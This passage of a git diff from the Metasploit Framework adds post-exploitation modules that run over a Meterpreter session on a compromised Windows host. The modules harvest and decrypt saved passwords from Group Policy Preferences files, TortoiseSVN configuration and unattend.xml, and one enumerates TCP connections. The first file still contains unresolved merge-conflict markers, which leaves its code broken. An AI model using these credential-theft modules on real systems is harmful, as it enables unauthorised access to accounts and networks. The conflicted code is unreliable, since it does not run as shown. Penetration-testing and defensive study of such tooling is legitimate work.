+ OptString.new('DOMAINS', [false, 'Enumerate list of space seperated domains DOMAINS="dom1 dom2".'])], self.class)
+ end
+
+ def run
+
+ group_path = "MACHINE\\Preferences\\Groups\\Groups.xml"
+ group_path_user = "USER\\Preferences\\Groups\\Groups.xml"
+ service_path = "MACHINE\\Preferences\\Services\\Services.xml"
+ printer_path = "USER\\Preferences\\Printers\\Printers.xml"
+ drive_path = "USER\\Preferences\\Drives\\Drives.xml"
+ datasource_path = "MACHINE\\Preferences\\Datasources\\DataSources.xml"
+ datasource_path_user = "USER\\Preferences\\Datasources\\DataSources.xml"
+ task_path = "MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
+ task_path_user = "USER\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
+
+ domains = []
+ dcs = []
+ basepaths = []
+ fullpaths = []
+ @enumed_domains = []
+
+ print_status "Checking locally.."
+ locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol"))
+ unless locals.blank?
+ basepaths << locals
+ print_good "Policy Sahres found locally"
+ end
+
+ if datastore['ALL'] and datastore['DOMAINS'].blank?
+ domains = enum_domains
+ domains.reject!{|n| n == "WORKGROUP"}
+ end
+
+ datastore['DOMAINS'].split('').each{|ud| domains << ud} if datastore['DOMAINS']
+ domains << get_domain_reg
+ domains.flatten!
+ domains.compact!
+ domains.uniq!
+
+
+ domains.each do |domain|
+ dcs = enum_dcs(domain)
+ next if dcs.blank?
+ dcs.uniq!
+ tbase = []
+ dcs.each do |dc|
+ print_status "Searching for Policy Share on #{dc}..."
+ tbase = get_basepaths("\\\\#{dc}\\SYSVOL")
+ #If we got a basepath from the DC we know that we can reach it
+ #All DCs on the same domain should be the same so we only need one
+ unless tbase.blank?
+ print_good "Found Policy Share on #{dc}"
+ basepaths << tbase
+ break
+ end
+ end
+ end
+
+ basepaths.flatten!
+ basepaths.compact!
+ print_status "Searching for Group Policy XML Files..."
+ basepaths.each do |policy_path|
+ fullpaths << find_path(policy_path, group_path)
+ fullpaths << find_path(policy_path, group_path_user)
+ fullpaths << find_path(policy_path, service_path)
+ fullpaths << find_path(policy_path, printer_path)
+ fullpaths << find_path(policy_path, drive_path)
+ fullpaths << find_path(policy_path, datasource_path)
+ fullpaths << find_path(policy_path, datasource_path_user)
+ fullpaths << find_path(policy_path, task_path)
+ fullpaths << find_path(policy_path, task_path_user)
+ end
+ fullpaths.flatten!
+ fullpaths.compact!
+ fullpaths.each do |filepath|
+ tmpfile = gpp_xml_file(filepath)
+ parse_xml(tmpfile) if tmpfile
+ end
+
+ end
+
+ def get_basepaths(base)
+ locals = []
+ begin
+ session.fs.dir.foreach(base) do |sub|
+ next if sub =~ /^(\.|\.\.)$/
+ tpath = "#{base}\\#{sub}\\Policies"
+ begin
+ session.fs.dir.foreach(tpath) do |sub2|
+ next if sub =~ /^(\.|\.\.)$/
+ locals << "#{tpath}\\#{sub2}\\"
+ end
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Could not access #{tpath} : #{e.message}"
+ end
+ end
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Error accessing #{base} : #{e.message}"
+ end
+ return locals
+ end
+
+
+>>>>>>> upstream/master
def find_path(path, xml_path)
xml_path = "#{path}\\#{xml_path}"
begin
@@ -200,13 +325,18 @@ class Metasploit3 < Msf::Post
end
end
+<<<<<<< HEAD
def get_xml(path)
+=======
+ def gpp_xml_file(path)
+>>>>>>> upstream/master
begin
groups = client.fs.file.new(path,'r')
until groups.eof
data = groups.read
end
+<<<<<<< HEAD
domain = path.split('\\')[2]
mxml = REXML::Document.new(data).root
@@ -334,6 +464,75 @@ class Metasploit3 < Msf::Post
end
end
+=======
+ spath = path.split('\\')
+ retobj = {
+ :dc => spath[2],
+ :path => path,
+ :xml => REXML::Document.new(data).root
+ }
+ if spath[4] == "sysvol"
+ retobj[:domain] = spath[5]
+ else
+ retobj[:domain] = spath[4]
+ end
+ return retobj
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Received error code #{e.code} when reading #{path}"
+ return nil
+ end
+ end
+
+ def parse_xml(xmlfile)
+ mxml = xmlfile[:xml]
+ print_status "Parsing file: #{xmlfile[:path]} ..."
+ mxml.elements.to_a("//Properties").each do |node|
+ epassword = node.attributes['cpassword']
+ next if epassword.to_s.empty?
+ next if @enumed_domains.include? xmlfile[:domain]
+ @enumed_domains << xmlfile[:domain]
+ pass = decrypt(epassword)
+
+ user = node.attributes['runAs'] if node.attributes['runAs']
+ user = node.attributes['accountName'] if node.attributes['accountName']
+ user = node.attributes['username'] if node.attributes['username']
+ user = node.attributes['userName'] if node.attributes['userName']
+ user = node.attributes['newName'] unless node.attributes['newName'].blank?
+ changed = node.parent.attributes['changed']
+
+ expires = node.attributes['expires']
+ never_expires = node.attributes['neverExpires']
+ disabled = node.attributes['acctDisabled']
+
+
+ table = Rex::Ui::Text::Table.new(
+ 'Header' => 'Group Policy Credential Info',
+ 'Indent' => 1,
+ 'SortIndex' => 5,
+ 'Columns' =>
+ [
+ 'Name',
+ 'Value',
+ ]
+ )
+
+ table << ["USERNAME", user ]
+ table << ["PASSWORD", pass]
+ table << ["DOMAIN CONTROLLER", xmlfile[:dc]]
+ table << ["DOMAIN", xmlfile[:domain] ]
+ table << ["CHANGED", changed]
+ table << ["EXPIRES", expires] unless expires.blank?
+ table << ["NEVER_EXPIRES?", never_expires] unless never_expires.blank?
+ table << ["DISABLED", disabled] unless disabled.blank?
+
+
+ print_good table.to_s
+ report_creds(user,pass) unless disabled and disabled == '1'
+ end
+ end
+
+
+>>>>>>> upstream/master
def report_creds(user, pass)
if session.db_record
source_id = session.db_record.id
@@ -368,7 +567,11 @@ class Metasploit3 < Msf::Post
return pass
end
+<<<<<<< HEAD
#enum_domains.rb
+=======
+
+>>>>>>> upstream/master
def enum_domains
print_status "Enumerating Domains on the Network..."
domain_enum = 0x80000000 # SV_TYPE_DOMAIN_ENUM
@@ -405,14 +608,21 @@ class Metasploit3 < Msf::Post
x[:platform] = mem[(base + 0),4].unpack("V*")[0]
nameptr = mem[(base + 4),4].unpack("V*")[0]
x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join
+<<<<<<< HEAD
domains << x
+=======
+ domains << x[:domain]
+>>>>>>> upstream/master
base = base + 8
end
return domains
end
+<<<<<<< HEAD
#enum_domains.rb
+=======
+>>>>>>> upstream/master
def enum_dcs(domain)
print_status("Enumerating DCs for #{domain}")
domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL)
@@ -423,7 +633,11 @@ class Metasploit3 < Msf::Post
result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,domain,nil)
end
if result['totalentries'] == 0
+<<<<<<< HEAD
print_error "No Domain Controllers found for #{domain}"
+=======
+ print_error("No Domain Controllers found for #{domain}")
+>>>>>>> upstream/master
return nil
end
@@ -433,7 +647,11 @@ class Metasploit3 < Msf::Post
base = 0
mem = client.railgun.memread(startmem, 8*count)
hostnames = []
+<<<<<<< HEAD
count.times do |i|
+=======
+ count.times{|i|
+>>>>>>> upstream/master
t = {}
t[:platform] = mem[(base + 0),4].unpack("V*")[0]
nameptr = mem[(base + 4),4].unpack("V*")[0]
@@ -441,6 +659,7 @@ class Metasploit3 < Msf::Post
base = base + 8
print_good "DC Found: #{t[:dc_hostname]}"
hostnames << t[:dc_hostname]
+<<<<<<< HEAD
end
return hostnames
@@ -482,3 +701,24 @@ class Metasploit3 < Msf::Post
end
end
+=======
+ }
+ return hostnames
+ end
+
+ def get_domain_reg
+ begin
+ subkey = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\"
+ v_name = "Domain"
+ domain = registry_getvaldata(subkey, v_name)
+ print_status "Retrieved domain #{domain} from registry "
+ rescue Rex::Post::Meterpreter::RequestError => e
+ print_error "Received error code #{e.code} - #{e.message} when reading the registry."
+ end
+ domain = domain.split('.')[0].upcase
+
+ return domain
+ end
+
+end
+>>>>>>> upstream/master
diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb
new file mode 100644
index 0000000000..c53ef63edc
--- /dev/null
+++ b/modules/post/windows/gather/credentials/tortoisesvn.rb
@@ -0,0 +1,211 @@
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'base64'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Windows::Priv
+ include Msf::Post::Windows::Registry
+ include Msf::Auxiliary::Report
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather TortoiseSVN Saved Password Extraction',
+ 'Description' => %q{
+ This module extracts and decrypts saved TortoiseSVN passwords. In
+ order for decryption to be successful this module must be executed
+ under the same privileges as the user which originally encrypted the
+ password.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Justin Cacak'],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+ end
+
+ def prepare_railgun
+ rg = session.railgun
+ if (!rg.get_dll('crypt32'))
+ rg.add_dll('crypt32')
+ end
+ end
+
+ def decrypt_password(data)
+ rg = session.railgun
+ pid = client.sys.process.getpid
+ process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+ mem = process.memory.allocate(128)
+ process.memory.write(mem, data)
+
+ if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86"
+ addr = [mem].pack("V")
+ len = [data.length].pack("V")
+ ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8)
+ #print_status("#{ret.inspect}")
+ len, addr = ret["pDataOut"].unpack("V2")
+ else
+ addr = [mem].pack("Q")
+ len = [data.length].pack("Q")
+ ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16)
+ len, addr = ret["pDataOut"].unpack("Q2")
+ end
+
+ return "" if len == 0
+ decrypted_pw = process.memory.read(addr, len)
+ return decrypted_pw
+ end
+
+ def get_proxy_data
+ # Check if user proxy setting are utilized
+ @key_base = "HKCU\\Software\\TortoiseSVN\\Servers\\global\\"
+ http_proxy_password = registry_getvaldata("#{@key_base}", 'http-proxy-password')
+
+ if http_proxy_password == nil
+ return
+ else
+ # A proxy with password is utilized, gather details
+ print_good("HTTP Proxy Settings")
+ http_proxy_username= registry_getvaldata("#{@key_base}", 'http-proxy-username')
+ http_proxy_host = registry_getvaldata("#{@key_base}", 'http-proxy-host')
+ http_proxy_port = registry_getvaldata("#{@key_base}", 'http-proxy-port')
+
+ # Output results to screen
+ print_status(" Host: #{http_proxy_host}")
+ print_status(" Port: #{http_proxy_port}")
+ print_status(" Username: #{http_proxy_username}")
+ print_status(" Password: #{http_proxy_password}")
+ print_status("")
+ end
+
+ # Report proxy creds
+ if session.db_record
+ source_id = session.db_record.id
+ else
+ source_id = nil
+ end
+ report_auth_info(
+ :host => Rex::Socket.resolv(http_proxy_host), # TODO: Fix up report_host?
+ :port => http_proxy_port,
+ :sname => "http",
+ :source_id => source_id,
+ :source_type => "exploit",
+ :user => http_proxy_username,
+ :pass => http_proxy_password)
+ end
+
+ def get_config_files
+ # Determine if TortoiseSVN is installed and parse config files
+ savedpwds = 0
+ user_appdata = session.fs.file.expand_path("%APPDATA%")
+ path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
+ print_status("Checking for configuration files in: #{path}")
+
+ begin
+ session.fs.dir.foreach(path) do |file_name|
+ next if file_name == "." or file_name == ".."
+ savedpwds = analyze_file(path+file_name)
+ end
+ rescue => e
+ print_error "Exception raised: #{e.message}"
+ print_status("No configuration files located: TortoiseSVN may not be installed or configured.")
+ return
+ end
+
+ if savedpwds == 0
+ print_status("No configuration files located")
+ end
+
+ end
+
+ def analyze_file(filename)
+ config = client.fs.file.new(filename, 'r')
+ contents = config.read
+ config_lines = contents.split("\n")
+
+ print_good("Account Found:")
+ line_num = 0
+
+ for line in config_lines
+ line.chomp
+ line_num += 1
+ if line_num == 8
+ enc_password = Base64.decode64(line)
+ password = decrypt_password(enc_password)
+ elsif line_num == 12
+ if line.match(/<(.*)>.(.*)/)
+ # Parse for output
+ url = $1
+ realm = $2
+ realm.gsub! "\r", "" #Remove \r (not common)
+ if line.match(/<(.*):\/\/(.*):(.*)>/)
+ # Parse for reporting
+ sname = $1
+ host = $2
+ portnum = $3
+ portnum.gsub! "\r", "" #Remove \r (not common)
+ end
+ else
+ url = ""
+ end
+ elsif line_num == 16
+ user_name = line
+ user_name.gsub! "\r", "" #Remove \r (not common)
+ end
+ end
+ config.close
+
+ #Handle null values or errors
+ if user_name == nil
+ user_name = ""
+ end
+
+ # Output results to screen
+ print_status(" URL: #{url}")
+ print_status(" Realm: #{realm}")
+ print_status(" User Name: #{user_name}")
+ print_status(" Password: #{password}")
+ print_status("")
+
+ # Report
+ if session.db_record
+ source_id = session.db_record.id
+ else
+ source_id = nil
+ end
+ report_auth_info(
+ :host => ::Rex::Socket.resolv_to_dotted(host), # XXX: Workaround for unresolved hostnames
+ :port => portnum,
+ :sname => sname,
+ :source_id => source_id,
+ :source_type => "exploit",
+ :user => user_name,
+ :pass => password)
+ print_debug "Should have reported..."
+
+ # Set savedpwds to 1 on return
+ return 1
+ end
+
+ def run
+ # Get uid. Decryption will only work if executed under the same user account as the password was encrypted.
+ uid = session.sys.config.getuid
+
+ if is_system?
+ print_error("This module is running under #{uid}.")
+ print_error("Automatic decryption will not be possible.")
+ print_error("Manually migrate to a user process to achieve successful decryption (e.g. explorer.exe).")
+ else
+ print_status("Searching for TortoiseSVN...")
+ prepare_railgun
+ get_config_files()
+ get_proxy_data()
+ end
+
+ print_status("Complete")
+ end
+
+end
diff --git a/modules/post/windows/gather/enum_files.rb b/modules/post/windows/gather/enum_files.rb
index 0bd860f59d..a348eb58ba 100644
--- a/modules/post/windows/gather/enum_files.rb
+++ b/modules/post/windows/gather/enum_files.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
-
+
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Generic File Collection',
@@ -58,9 +58,9 @@ class Metasploit3 < Msf::Post
def download_files(location, file_type)
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
- sysnfo = client.sys.config.sysinfo['OS']
+ sysnfo = client.sys.config.sysinfo['OS']
profile_path_old = sysdriv + "\\Documents and Settings\\"
- profile_path_new = sysdriv + "\\Users\\"
+ profile_path_new = sysdriv + "\\Users\\"
if location
print_status("Searching #{location}")
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Post
elsif sysnfo =~/(Windows XP|2003|.NET)/
print_status("Searching #{profile_path_old} through windows user profile structure")
getfile = client.fs.file.search(profile_path_old,file_type,recurse=true,timeout=-1)
- else
+ else
# For systems such as: Windows 7|Windows Vista|2008
print_status("Searching #{profile_path_new} through windows user profile structure")
getfile = client.fs.file.search(profile_path_new,file_type,recurse=true,timeout=-1)
diff --git a/modules/post/windows/gather/enum_unattend.rb b/modules/post/windows/gather/enum_unattend.rb
new file mode 100644
index 0000000000..e588ffe5f6
--- /dev/null
+++ b/modules/post/windows/gather/enum_unattend.rb
@@ -0,0 +1,201 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/post/file'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather Unattended Answer File (unattend.xml) Enumeration',
+ 'Description' => %q{
+ This module will check the file system for a copy of
+ unattend.xml then extract sensitive information such as username
+ and decoded passwords.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Sean Verity ',
+ 'sinn3r'
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://technet.microsoft.com/en-us/library/ff715801']
+ ],
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter' ]
+ ))
+ end
+
+
+ #
+ # Determie if unattend.xml exists or not
+ #
+ def unattend_exists?(xml_path)
+ x = session.fs.file.stat(xml_path) rescue nil
+ return !x.nil?
+ end
+
+
+ #
+ # Read the raw content of unattend.xml
+ #
+ def load_unattend(xml_path)
+ print_status("Reading #{xml_path}")
+ f = session.fs.file.new(xml_path)
+ buf = ""
+ until f.eof?
+ buf << f.read
+ end
+
+ return buf
+ end
+
+
+ #
+ # Extract all the interesting information from unattend.xml,
+ # and return an array or tables
+ #
+ def extract_creds(f)
+ begin
+ xml = REXML::Document.new(f)
+ rescue REXML::ParseException => e
+ print_error("Invalid XML format")
+ vprint_line(e.message)
+ return []
+ end
+ base_node = 'unattend/settings/component/UserAccounts'
+ user_accounts = xml.elements[base_node]
+
+ # If there's no UsersAccounts, then there's no point to continue
+ if user_accounts.nil?
+ print_error("No UserAccounts node found")
+ return []
+ end
+
+ cred_tables = []
+ account_types = ['AdministratorPassword', 'DomainAccounts', 'LocalAccounts']
+ account_types.each do |t|
+ node = user_accounts.elements[t]
+ next if node.nil?
+
+ case t
+ #
+ # Extract the password from AdministratorPasswords
+ #
+ when account_types[0]
+ table = Rex::Ui::Text::Table.new({
+ 'Header' => 'AdministratorPasswords',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password']
+ })
+
+ password = Rex::Text.decode_base64(node.elements['Value'].get_text) rescue ''
+ password = password.gsub(/#{Rex::Text.to_unicode('AdministratorPassword')}$/, '')
+ if not password.empty?
+ table << ['Administrator', password]
+ cred_tables << table
+ end
+
+ #
+ # Extract the sensitive data from DomainAccounts.
+ # According to MSDN, unattend.xml doesn't seem to store passwords for domain accounts
+ #
+ when account_types[1] #DomainAccounts
+ table = Rex::Ui::Text::Table.new({
+ 'Header' => 'DomainAccounts',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Group']
+ })
+
+ node.elements.each do |account_list|
+ name = account_list.elements['DomainAccount/Name'].get_text rescue ''
+ group = account_list.elements['DomainAccount/Group'].get_text rescue ''
+
+ table << [name, group]
+ end
+
+ cred_tables << table if not table.rows.empty?
+
+ #
+ # Extract the username/password from LocalAccounts
+ #
+ when account_types[2] #LocalAccounts
+ table = Rex::Ui::Text::Table.new({
+ 'Header' => 'LocalAccounts',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password']
+ })
+
+ node.elements.each do |local|
+ password = Rex::Text.decode_base64(local.elements['Password/Value'].get_text) rescue ''
+ password = password.gsub(/#{Rex::Text.to_unicode('Password')}$/, '')
+ username = local.elements['Name'].get_text rescue ''
+ table << [username, password]
+ end
+
+ cred_tables << table if not table.rows.empty?
+ end
+ end
+
+ return cred_tables
+ end
+
+
+ #
+ # Save Rex tables separately
+ #
+ def save_cred_tables(cred_tables)
+ cred_tables.each do |t|
+ vprint_line("\n#{t.to_s}\n")
+ p = store_loot('windows.unattended.creds', 'text/csv', session, t.to_csv)
+ print_status("#{t.header} saved as: #{p}")
+ end
+ end
+
+
+ #
+ # Save the raw version of unattend.xml
+ #
+ def save_raw(data)
+ store_loot('windows.unattended.raw', 'text/plain', session, data)
+ end
+
+
+ def run
+ drive = session.fs.file.expand_path("%SystemDrive%")
+ xml_path = "#{drive}\\Windows\\System32\\sysprep\\unattend.xml"
+
+ # If unattend.xml doesn't exist, no point to continue
+ if not unattend_exists?(xml_path)
+ print_error("#{xml_path} not found")
+ return
+ end
+
+ # If unattend.xml is actually empty, no point to continue, either.
+ f = load_unattend(xml_path)
+ if f.empty?
+ print_error("#{xml_path} is empty")
+ return
+ end
+
+ # Save the raw version in case the user wants more information
+ p = save_raw(f)
+ print_status("Raw version of unattend.xml saved as: #{p}")
+
+ # Extract the credentials
+ cred_tables = extract_creds(f)
+
+ # Save the data
+ save_cred_tables(cred_tables)
+ end
+end
diff --git a/modules/post/windows/gather/forensics/duqu_check.rb b/modules/post/windows/gather/forensics/duqu_check.rb
index c7de2d5fdf..1f42032bf2 100644
--- a/modules/post/windows/gather/forensics/duqu_check.rb
+++ b/modules/post/windows/gather/forensics/duqu_check.rb
@@ -7,6 +7,7 @@
require 'msf/core'
require 'msf/core/post/common'
+require 'msf/core/post/windows/registry'
require 'msf/core/post/windows/priv'
class Metasploit3 < Msf::Post
@@ -55,11 +56,11 @@ class Metasploit3 < Msf::Post
match += 1
report_vuln(
:host => session.session_host,
- :name => self.fullname,
- :info => "#{path}\\#{query} possible CVE-2011-3402 exploitation [Duqu] artifact.",
+ :name => self.name,
+ :info => "Module #{self.fullname} detected #{path}\\#{query} - possible CVE-2011-3402 exploitation [Duqu] artifact.",
:refs => self.references,
- :exploited_at => Time.now.utc
- )
+ :exploited_at => Time.now.utc,
+ )
end
end
rescue # Probably should do something here...
diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb
new file mode 100644
index 0000000000..fb1eb38967
--- /dev/null
+++ b/modules/post/windows/gather/tcpnetstat.rb
@@ -0,0 +1,107 @@
+##
+# $Id$
+##
+
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::Common
+ include Msf::Auxiliary::Report
+
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'Windows Gather TCP Netstat',
+ 'Description' => %q{ This Module lists current TCP sessions},
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Rob Fuller '],
+ 'Version' => '$Revision$',
+ 'Platform' => [ 'windows' ],
+ 'SessionTypes' => [ 'meterpreter']
+ ))
+ register_options(
+ [
+ ], self.class)
+ end
+
+ def parse_tcptable(buffer)
+ entries = buffer[0,4].unpack("V*")[0]
+ print_status("Total TCP Entries: #{entries}")
+
+ rtable = Rex::Ui::Text::Table.new(
+ 'Header' => 'Routing Table',
+ 'Indent' => 2,
+ 'Columns' => ['STATE', 'LHOST', 'LPORT', 'RHOST', 'RPORT']
+ )
+ offset = 4
+ (1..entries).each do
+ x = {}
+ x[:state] = case buffer[(offset + 0), 4].unpack("V*")[0]
+ when 1
+ 'CLOSED'
+ when 2
+ 'LISTEN'
+ when 3
+ 'SYN_SENT'
+ when 4
+ 'SYN_RCVD'
+ when 5
+ 'ESTABLISHED'
+ when 6
+ 'FIN_WAIT1'
+ when 7
+ 'FIN_WAIT2'
+ when 8
+ 'CLOSE_WAIT'
+ when 9
+ 'CLOSING'
+ when 10
+ 'LAST_ACK'
+ when 11
+ 'TIME_WAIT'
+ when 12
+ 'DELETE_TCB'
+ else
+ 'UNDEFINED'
+ end
+ x[:lhost] = Rex::Socket.addr_itoa(buffer[(offset + 4), 4].unpack("N")[0])
+ x[:lport] = buffer[(offset + 8), 4].unpack("n")[0]
+ x[:rhost] = Rex::Socket.addr_itoa(buffer[(offset + 12), 4].unpack("N")[0])
+ if x[:state] == "LISTEN"
+ x[:rport] = "_"
+ else
+ x[:rport] = buffer[(offset + 16), 4].unpack("n")[0]
+ end
+ offset = offset + 20
+ rtable << [x[:state], x[:lhost], x[:lport], x[:rhost], x[:rport]]
+ end
+ print_status(rtable.to_s)
+ end
+
+ def run
+ session.railgun.add_function('iphlpapi', 'GetTcpTable', 'DWORD', [
+ ['PBLOB', 'pTcpTable', 'out'],
+ ['PDWORD', 'pdwSize', 'inout'],
+ ['BOOL', 'bOrder', 'in']
+ ])
+
+ getsize = session.railgun.iphlpapi.GetTcpTable(4,4,true)
+ buffersize = getsize['pdwSize']
+
+ print_status("TCP Table Size: #{buffersize}")
+ tcptable = session.railgun.iphlpapi.GetTcpTable(buffersize,buffersize,true)
+
+ parse_tcptable(tcptable['pTcpTable'])
+ end
+end
diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb
index 61c5a08ec4..53141daa21 100644
--- a/modules/post/windows/manage/remove_ca.rb
+++ b/modules/post/windows/manage/remove_ca.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
- 'Name' => 'Windows Certificate Authority Removal',
+ 'Name' => 'Windows Manage Certificate Authority Removal',
'Description' => %q{
This module allows the attacker to remove an arbitrary CA certificate
from the victim's Trusted Root store.},
diff --git a/msfbinscan b/msfbinscan
index c36f172e29..442bf3e7f4 100755
--- a/msfbinscan
+++ b/msfbinscan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfcli b/msfcli
index 04ce300ea7..c220b83a07 100755
--- a/msfcli
+++ b/msfcli
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfconsole b/msfconsole
index 95adf9efea..c21594147f 100755
--- a/msfconsole
+++ b/msfconsole
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
@@ -34,7 +35,9 @@ class OptsConsole
# Return a hash describing the options.
#
def self.parse(args)
- options = {}
+ options = {
+ 'DeferModuleLoads' => true
+ }
opts = OptionParser.new do |opts|
opts.banner = "Usage: msfconsole [options]"
diff --git a/msfd b/msfd
index b7b2b7eff7..411a134b04 100755
--- a/msfd
+++ b/msfd
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfelfscan b/msfelfscan
index 25ea61e695..b4714307bb 100755
--- a/msfelfscan
+++ b/msfelfscan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfencode b/msfencode
index 7a7f8d5cb3..a147a1209a 100755
--- a/msfencode
+++ b/msfencode
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfgui b/msfgui
index ae4d04571d..05b6d5e510 100755
--- a/msfgui
+++ b/msfgui
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfmachscan b/msfmachscan
index b891c4204c..b3b7701f43 100755
--- a/msfmachscan
+++ b/msfmachscan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfpayload b/msfpayload
index 8a361a4ffe..e6bef308b5 100755
--- a/msfpayload
+++ b/msfpayload
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfpescan b/msfpescan
index 90175220c6..33ce327765 100755
--- a/msfpescan
+++ b/msfpescan
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
# $Revision$
diff --git a/msfrop b/msfrop
index dfbc743ead..91283e5717 100755
--- a/msfrop
+++ b/msfrop
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfrpc b/msfrpc
index 422c091d6e..ffbfe9c594 100755
--- a/msfrpc
+++ b/msfrpc
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfrpcd b/msfrpcd
index 0388eb52e8..31b0196435 100755
--- a/msfrpcd
+++ b/msfrpcd
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id$
#
diff --git a/msfupdate b/msfupdate
index 8858ccfa13..e1d3af9a2b 100755
--- a/msfupdate
+++ b/msfupdate
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# $Id$
# $Revision$
diff --git a/msfvenom b/msfvenom
index 038ede647d..7684938b86 100755
--- a/msfvenom
+++ b/msfvenom
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Id: msfvenom 14909 2012-03-10 06:50:03Z rapid7 $
# $Revision: 14909 $
@@ -310,7 +311,7 @@ opts[:badchars] = Rex::Text.hex_to_raw(opts[:badchars]) if opts[:
# set the defaults unless something is already set by the user
if opts[:payload] != 'stdin'
opts[:arch] ||= payload.arch[0]
- opts[:platform] ||= payload.platform.platforms
+ opts[:platform] ||= Msf::Module::PlatformList.transform(payload.platform.platforms)
else
# defaults for stdin payloads users should define them
unless opts[:arch]
@@ -448,15 +449,31 @@ when /java/i
print_error("Could not generate payload format")
end
when /elf/i
- if opts[:arch] =~ /x64/
- elf = Msf::Util::EXE.to_linux_x64_elf($framework, payload_raw, exeopts)
- elsif opts[:arch] =~ /x86/
- elf = Msf::Util::EXE.to_linux_x86_elf($framework, payload_raw, exeopts)
- elsif opts[:arch] =~ /arm/
- elf = Msf::Util::EXE.to_linux_armle_elf($framework, payload_raw, exeopts)
- else
- print_error("This format does not support that architecture")
- exit
+ if (not opts[:platform] or (opts[:platform].index(Msf::Module::Platform::Linux)))
+ if opts[:arch] =~ /x64/
+ elf = Msf::Util::EXE.to_linux_x64_elf($framework, payload_raw, exeopts)
+ elsif opts[:arch] =~ /x86/
+ elf = Msf::Util::EXE.to_linux_x86_elf($framework, payload_raw, exeopts)
+ elsif opts[:arch] =~ /arm/
+ elf = Msf::Util::EXE.to_linux_armle_elf($framework, payload_raw, exeopts)
+ else
+ print_error("This format does not support that architecture")
+ exit
+ end
